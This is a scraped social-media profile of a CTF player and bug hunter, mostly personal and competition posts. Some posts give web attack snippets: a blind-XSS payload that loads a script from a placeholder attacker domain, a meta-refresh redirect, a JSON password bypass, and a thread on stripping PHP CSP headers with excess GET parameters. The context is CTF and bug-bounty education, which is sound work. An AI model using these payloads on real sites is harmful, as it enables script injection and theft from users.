pilvar Profile Banner
pilvar Profile
pilvar

@pilvar222

Followers
937
Following
380
Media
82
Statuses
280

Computer Science student @EPFL | CTF player @polygl0ts and @0rganizers | ECSC Swiss National Hacking Team @TeamM0unt41n | Part-time bug hunter 🐞

Joined October 2013
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@pilvar222
pilvar
2 months
My talk for @1ns0mn1h4ck is now available on youtube! Hope you'll enjoy it! :D
5
55
208
@pilvar222
pilvar
3 months
🧵[1/9] Time to publish the solution to this challenge! The goal of this challenge was to find an XSS while avoiding it being blocked by the CSP sent by the PHP header() function. Let's dive into it!
@pilvar222
pilvar
3 months
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks". I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)
Tweet media one
Tweet media two
9
31
205
4
46
211
@pilvar222
pilvar
3 months
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks". I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)
Tweet media one
Tweet media two
9
31
205
@pilvar222
pilvar
1 year
1) This is not a wordpress vulnerability, but a plugin's one 2) This is not a 0day, it's already been reported and fixed since September 3) If it was, you would be disclosing it unresponsibly Yet, you received tons of likes and RT by straight up lying 🤡
@VulnVision
VulnVision
1 year
we are happy to share a 0day we have found on wordpress login page allow un-auth cross site scripting (xss) #bugbountytip #BugBounty #ItTakesACrowd
Tweet media one
Tweet media two
40
284
1K
5
12
79
@pilvar222
pilvar
5 months
My talk for @1ns0mn1h4ck 2024 got accepted! 😄🎉 I'm so excited!
Tweet media one
13
1
82
@pilvar222
pilvar
2 years
Yay, I was awarded a $2000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Big thanks to all absurd XSS black magic fuckeries I've seen in various CTFs, really helped be getting my exploit to work :D
5
3
70
@pilvar222
pilvar
2 months
CTF challenge authors who put 8080 as the exposed port for their web challenges: *arrives in hell* Satan:
Tweet media one
2
1
54
@pilvar222
pilvar
9 months
Imagine creating a web chall using the sanitizer API, then Chrome just fucking removes it with its new release 3 days before the CTF starts 💀 Anyway, come play LakeCTF, it's this weekend and I've prepared 2 challenges for it :) (and go follow @polygl0ts !)
0
2
49
@pilvar222
pilvar
4 months
This week, I'm training for team EU quals!
Tweet media one
2
5
47
@pilvar222
pilvar
2 years
Why are CTF web challenges without source code still a thing in 2022
7
2
47
@pilvar222
pilvar
1 year
Thanks for the cool banner @secconctf :D
Tweet media one
0
6
44
@pilvar222
pilvar
4 months
Haven't had this in the wild yet so don't know how useful of a tip this is, but adding a generic CSP bypass for your bxss payloads might be a good idea x=("/%00"); setTimeout(()=>x.document.write("<img src=x onerror='import(\"//YourBXSSDomain\")'>"),999)
3
3
43
@pilvar222
pilvar
1 year
blooded two challs + first to full clear web, guess I'm the best web security company out there lol #BusinessCTF23
Tweet media one
3
2
41
@pilvar222
pilvar
1 year
Getting flags from my uni while enjoying the sunrise, feels good ~
Tweet media one
0
0
40
@pilvar222
pilvar
1 year
Can't believe this just happened 🤯 @msftsecurity if you need to learn hacc plz hire me ty #BusinessCTF23
Tweet media one
Tweet media two
4
1
34
@pilvar222
pilvar
7 months
Browser moment
Tweet media one
1
0
32
@pilvar222
pilvar
3 months
@terjanq 🧵[6/9] This means that if we have, for example, a request containing more than 1000 GET parameters, a warning will be sent, and the CSP header won't! Trying this solution () on remote, we can pop an alert!
Tweet media one
Tweet media two
1
3
31
@pilvar222
pilvar
8 months
met kalmarunionnen at #BHMEA23 :)
Tweet media one
1
0
28
@pilvar222
pilvar
10 months
I find pentesting Active Directory to be hard because of all of the tools, commands, and techniques you have to keep in mind, but @orangecyberdef 's mindmap is very nice and it helped me a ton of times! I can only recommend putting it in your bookmarks :)
2
6
22
@pilvar222
pilvar
3 months
Last year I cried over a @PlaidCTF web challenge all night while being super sleep-deprived... But this year, well exactly the same thing happened, but at least it's solved now 🫠
1
1
22
@pilvar222
pilvar
2 years
OMG this explains so much things!! I wonder how I missed this info all my life! Thanks @WebSecAcademy ! :D
Tweet media one
@WebSecAcademy
Web Security Academy
2 years
We've just launched a new topic on bypassing SameSite cookie restrictions! Learn how to evade browsers' cookie defences and perform successful cross-site attacks with our interactive labs:
4
68
251
0
3
20
@pilvar222
pilvar
2 years
Have lots of things I want to do for 2023, but my main objective would be to create a blog for CTF/bug bounty/CVEs writeups :)
1
0
18
@pilvar222
pilvar
8 months
Met up with @vie_pls and @_under_hill today! They were in Switzerland for the week, couldn't miss the occasion to hang out with them :)
Tweet media one
0
0
18
@pilvar222
pilvar
11 months
So, codegate finals start in 16 hours, but our reverser got sick 😅 Anyone in Seoul or close by wanna join us? (0rganizers) :p
6
3
18
@pilvar222
pilvar
3 months
1
1
16
@pilvar222
pilvar
1 year
@CTFtime Great decision!
1
0
2
@pilvar222
pilvar
1 year
After 7 years of service, I have to say goodbye to my old laptop and all of its stickers. Will definitely miss some of them. Now is the time for me to start again on a fresh new one, good thing I had some left! :)
Tweet media one
6
0
16
@pilvar222
pilvar
8 months
Awesome writeup by @xanhacks for my LakeCTF challenge GeoGuessy, including the two unintended as well as the intended solution! Go check it out it's very nice :)
@xanhacks
xanhacks
8 months
Write-up of the last Web challenge of @LakeCtf 2023, which I was unable to solve during the competition. 🚩 Race conditions, XSS, and bypasses of client-side security to extract the GPS coordinates of the bot
0
14
77
1
0
15
@pilvar222
pilvar
1 year
Thanks to Open Data Playground and the sponsors for this amazing event, was nice meeting y'all :)
Tweet media one
1
0
15
@pilvar222
pilvar
9 months
Hey that's us on the first pic! 😄
@CyberSecRumble
Cyber Security Rumble
9 months
🏆 Reliving the highlights of the Cybersecurity Rumble 2023! Again, congratulations to our winners: 🥇 p0lyflag 🥈 __watermelon_chk_fail 🥉 @C_S_C_G A big shoutout to all teams, volunteers and our amazing partners, you made this event unforgettable! Until next year! 🚀
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
1
4
1
0
14
@pilvar222
pilvar
3 months
@terjanq 🧵[5/9] At this point, it is necessary to dive into php internals, and look for a way to create warnings before the php page code is executed. Looking at the http parameters processing, we can find that there are multiple cases where warnings are created, here are three examples:
Tweet media one
1
2
14
@pilvar222
pilvar
2 years
Yay, I was awarded a $500 bounty on @Hacker0x01 ! #TogetherWeHitHarder I honestly forgot about this report, what a great surprise :D
Tweet media one
4
0
12
@pilvar222
pilvar
7 months
Not a first blood, but hey at least I get the $100 swag card :p Thanks for these cool challs @hackthebox_eu ! Am enjoying them a lot :) #OperationTinselTrace
Tweet media one
2
0
12
@pilvar222
pilvar
10 months
Just completed @hackthebox_eu 's Blockchain challenges! That was quite fun, looking forward to start solving some in CTFs :)
Tweet media one
2
0
12
@pilvar222
pilvar
2 years
Day 1/33 of going to EPFL everyday to study for my semester exams because I didn't do shit until now. This will be painful, but I know I can do it! 🙂
Tweet media one
2
0
11
@pilvar222
pilvar
7 months
@intigriti Easy, unsubscribeUser is not defined. The dev forgot to include the necessary js code for this feature to work, making the company vulnerable to GDPR fines 😎
0
0
10
@pilvar222
pilvar
11 months
happy ending
Tweet media one
@willbenem
William / HestenettetDK
1 year
@pilvar222 1. Why do you have a sticker of my face. 2. Are you coming to defcon I can get you another one :P
1
0
1
0
0
10
@pilvar222
pilvar
1 year
Day 33/33! That's a wrap for this semester! I'm really happy that I've been able to actually do it. I've never had to put aside my hobbies for school, so doing it for uni wasn't easy, so I'm really proud of myself for achieving this :) Now it's time to get back to fun things! :D
Tweet media one
3
0
9
@pilvar222
pilvar
6 months
This is all I need❤️
Tweet media one
2
0
9
@pilvar222
pilvar
2 months
Awesome writeup, thanks for sharing it @MaitaiThe :)
@MaitaiThe
maitai
2 months
After around 20 days i've successfully completed the writeup for the last web chall of @LakeCtf finals. Even though i was not able to solve it, i've learned so much. I would like to thank @pilvar222 really much for dealing with me during all the process.
2
9
37
0
0
8
@pilvar222
pilvar
8 months
Congratz to the qualified teams! :)
@polygl0ts
polygl0ts
8 months
And that's a wrap for LakeCTF Quals 2023! Congratulations to our 9 qualified teams! 🥇 @dicegangctf 🥈 ISITDTU 🥉 @fibonhack See you all in Lausanne for the finals! 😄 PS: The 10th spot for the finals can still be won as the first prize of @1ns0mn1h4ck 's CTF academic bracket!
Tweet media one
0
6
29
0
0
8
@pilvar222
pilvar
2 years
@CyberTeamItaly @0rganizers @CyberSecNatLab @CyberChallengIT @openECSC @enisa_eu Once more, the maestro of Italian cinema, CyberTeamItaly, gives us a heady mixture of suspense, stormy melodrama, and theatrically dramatic characters. It is safe to say that we've found this year's winners. 9.5/10
0
0
7
@pilvar222
pilvar
6 months
Nice lol
Tweet media one
2
0
6
@pilvar222
pilvar
2 years
@intigriti {"password":true} gave me access to the admin panel :D
1
0
7
@pilvar222
pilvar
2 years
@Burp_Suite Ah yes, Burp Suite Yoda edition
0
0
7
@pilvar222
pilvar
11 months
@kevin_mizu Ayy! Thx for the chal :) Now is time to send you a weaponized solution and pwn your blog😈
Tweet media one
1
0
7
@pilvar222
pilvar
3 months
🧵[3/9] This issue can be abused by forcing a page to send content before the header() function, thus preventing the presence of a potentially important security header. This has already been used in CTF challenges, notably in baby-csp by @terjanq
Tweet media one
1
1
6
@pilvar222
pilvar
6 months
@zeyu2001 The story repeats lol Have the same feelings sometimes. Especially rwctf style challs where you need to find a 0day in a repo. Just feels like work it's not very enjoyable and it's tiring
@zeyu2001
Zeyu (Zayne) | @[email protected]
1 year
ctf burnout is real, maybe I'll just hibernate until defcon
2
0
20
1
0
6
@pilvar222
pilvar
3 months
@terjanq 🧵[7/9] This solution is only one among many. From the different solutions I've seen, some also used the maximum length of the parameters or files, and I wouldn't be surprised if many others are still unexplored ways to have warnings! In any case, big props to the solvers!
1
1
6
@pilvar222
pilvar
2 years
I wrote the web challenge Clob-Mate for LakeCTF, come try it out!
@polygl0ts
polygl0ts
2 years
LakeCTF has officially started and will run for 24 hours ! Come and check out our challenges and try to qualify for the finals in Lausanne ! @ICepfl #EPFLIC20
0
5
15
0
0
6
@pilvar222
pilvar
9 months
Awesome looking tool for finding well-hidden client-side vulns! Can't to try it out! 😄
@kevin_mizu
Kévin - Mizu
9 months
Excited to launch my first browser extension, DOMLogger++! Now available for both Firefox and Chromium! 🎉 DOMLogger++ allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations 🔥 Check it out 👇 1/5
8
96
289
0
0
6
@pilvar222
pilvar
2 years
Just discovered this version of DOM clobbering while reading @Strellic_ 's very cool write-up of his own challenge "AnalyticalEngine" . Can't wait to see the new challenges he made for corCTF 2022! 😁
Tweet media one
1
0
5
@pilvar222
pilvar
1 year
@zeyu2001 don't worry, I got ya :p Jokes asides, they were insanely good, thanks a lot :)
Tweet media one
0
0
5
@pilvar222
pilvar
3 months
Additional notes: - here's my solution md5 hash (will release this weekend): f3512c46daf0431d3567c2f21ef82f60 - if you solved it, please DM me and don't comment your solution :) - the intended is not a 0day, please don't submit me yours 😅 - solvers get credits + a drink from me!
1
0
5
@pilvar222
pilvar
3 months
Congratz to @hash_kitten for getting the first blood🩸! 😄
1
0
5
@pilvar222
pilvar
2 years
@hackthebox_eu no ideas of what's this, but kinda hyped anyway lol
1
0
4
@pilvar222
pilvar
1 year
Day 30/33, yeah sex is cool, but have you ever had a Club Mate after spending weeks without drinking any?
Tweet media one
1
0
4
@pilvar222
pilvar
1 year
Day 32/33, last exam tomorrow. Let's hope all of this work will have been more useful than just giving me a caffeine addiction :))
Tweet media one
1
0
4
@pilvar222
pilvar
7 months
close ones 🥲
Tweet media one
Tweet media two
0
0
2
@pilvar222
pilvar
2 years
@OctagonNetworks The fumction is only used to prepend backslashes to certain characters such as quotes. However, here, you don't need these to continue the query, you can simply uses spaces, subqueried, etc...
1
0
4
@pilvar222
pilvar
2 years
Day 13/33, lots of people everywhere, but found a cool little spot for myself :)
Tweet media one
1
0
4
@pilvar222
pilvar
1 year
@intigriti Does that count? /app.php?path=<meta/http-equiv=refresh%20content=0;//pilv.ar/ :))
0
0
4
@pilvar222
pilvar
2 years
Day 9/33, passing by the neat building where Insomni'hack 2023 will take place, it's only in 2.5 monthes, but I'm already hyped :p
Tweet media one
2
0
4
@pilvar222
pilvar
2 years
I love programs like these! Compensate for efforts put into a duplicate is probably the best way a program can show its consideration for its hackers ❤️ (Also helps us keeping sanity 😅) #BugBounty
Tweet media one
0
0
4
@pilvar222
pilvar
2 years
Day 2/33, the sky is clear, it's a nice morning today!
Tweet media one
2
0
4
@pilvar222
pilvar
2 years
Day 6/33, decided to help my team a bit for ASIS CTF from EPFL, and we won so it was worth it :)
Tweet media one
1
0
4
@pilvar222
pilvar
2 years
@LiveOverflow @Ox4d5a Hi, here are the 340,282,366,920,938,000,000,000,000,000,000,000,000 ipv6 adresses I'd like to scan :)))
1
1
3
@pilvar222
pilvar
1 year
@Shadowwws7 Heh, it's not *that* ephemeral, when I'll be old I'll hang all of my laptops on the wall and it'll give me great memories :)
1
0
3
@pilvar222
pilvar
1 year
No way they really did this
Tweet media one
0
0
3
@pilvar222
pilvar
2 years
```rb fun fact: discord's tweet integration supports text formatting! ``` __we can even mention other users!__ < @229923319829364736 >
1
1
3
@pilvar222
pilvar
2 years
If you (or someone who you know) wants to do a Security internship at @google Zurich, the application form is now up: Interns at Google Security work on real cool stuff, so I highly recommend it. Hit me up if you have any questions. #intern #security
3
42
59
0
0
3
@pilvar222
pilvar
1 year
Day 25/33, feeling better, back on the battle field! :)
1
0
3
@pilvar222
pilvar
2 months
@garlic0ne It's the default port for Burp Suite's proxy, so either the chall or the proxy fails to run until you change and restart it, which is quite annoying 😅
0
0
3
@pilvar222
pilvar
2 years
It was a really fun experience, thanks everyone for participating! :)
@polygl0ts
polygl0ts
2 years
LakeCTF Qualification has ended ! Congratulations to the top 10 teams (7 Academic teams and 3 Non-Academic) that qualify for the finals @EPFL the 5th of November. 1st. @dicegangctf 2nd. @flagbot_eth 3rd. @SuperGuesser @ICepfl #EPFLIC20
Tweet media one
0
11
52
0
0
3
@pilvar222
pilvar
3 months
🧵[2/9] Depending on the configuration, PHP is not able to modify the headers of a response once the body has a certain amount of characters in it. This is the buffering setting, which is usually set to 4096 characters, or in the case of the php:apache image, simply disabled.
1
0
3
@pilvar222
pilvar
4 months
The idea behind this is not to bypass js execution-related csp but more for the ones that prevent connection to external domains. Usually servers and proxies won't like the %00 in the url and error out before even adding the csp header. You can execute your payload in this window
0
0
3
@pilvar222
pilvar
3 months
@terjanq 🧵[4/9] However, this technique has certain limitations. It requires either sending data before header() via functions such as echo, or to have warnings created by the code before header() while display_errors is enabled. This challenge requires us to surpass these limitations.
Tweet media one
1
1
3
@pilvar222
pilvar
2 years
Day 18/33, always woke up late and studied until late so far, which was really cool! But my first exam is in 4 days. Gotta fix my sleep cycle now :/
Tweet media one
3
0
3
@pilvar222
pilvar
2 years
@albinowax If you're still looking for some ideas, I recently learned about TLS poisoning, and I think it could have more potential by digging further! :) @joshmdx , the researcher that discovered this, had some suggestions here: (timecode). Good luck! :D
1
0
3
@pilvar222
pilvar
2 years
@cyan_pencil I thought of it, but I'm unfortunately unable to do so for reasons beyond my control 😤
Tweet media one
0
0
3
@pilvar222
pilvar
2 years
Day 5/33, let's keep this going!
Tweet media one
3
0
3
@pilvar222
pilvar
1 year
Day 29/33, had my 3rd exam today, it went pretty good! That sends the counter down to one. Time for the final sprint!
Tweet media one
1
0
2
@pilvar222
pilvar
2 years
I've got it @Hacker0x01 , but please just chill a bit, idk try to take a big breath or smth
Tweet media one
0
0
2
@pilvar222
pilvar
2 years
@hackthebox_eu Cursed Tactics Frenzy
0
0
2
@pilvar222
pilvar
2 years
@BroodaShah @RealTryHackMe @hackthebox_eu @PentesterLab Almost there! Honestly impressed by your commitment, you're off to a great start for a prodigious career! :D
1
0
2
@pilvar222
pilvar
2 years
Day 16/33, time to get something to eat :)
Tweet media one
2
0
2
@pilvar222
pilvar
1 year
@vie_pls Ayyy happy birthday Vie! 😄
1
0
2
@pilvar222
pilvar
5 months
@dreyand_ @1ns0mn1h4ck Yes, Insomni'hack usually uploads the talks on youtube :)
0
0
2
@pilvar222
pilvar
25 days
@Blaklis_ @rulerhack Oh neat! Didn't know about this resource, thanks for sharing :)
0
0
2
@pilvar222
pilvar
2 years
@bugbounty_ch Thank you for this lovely christmas gift :D
0
0
2
@pilvar222
pilvar
2 years
Day 10/33 😋
Tweet media one
2
0
2
@pilvar222
pilvar
2 years
Day 11/33, that's already one third done! 😄
Tweet media one
1
0
2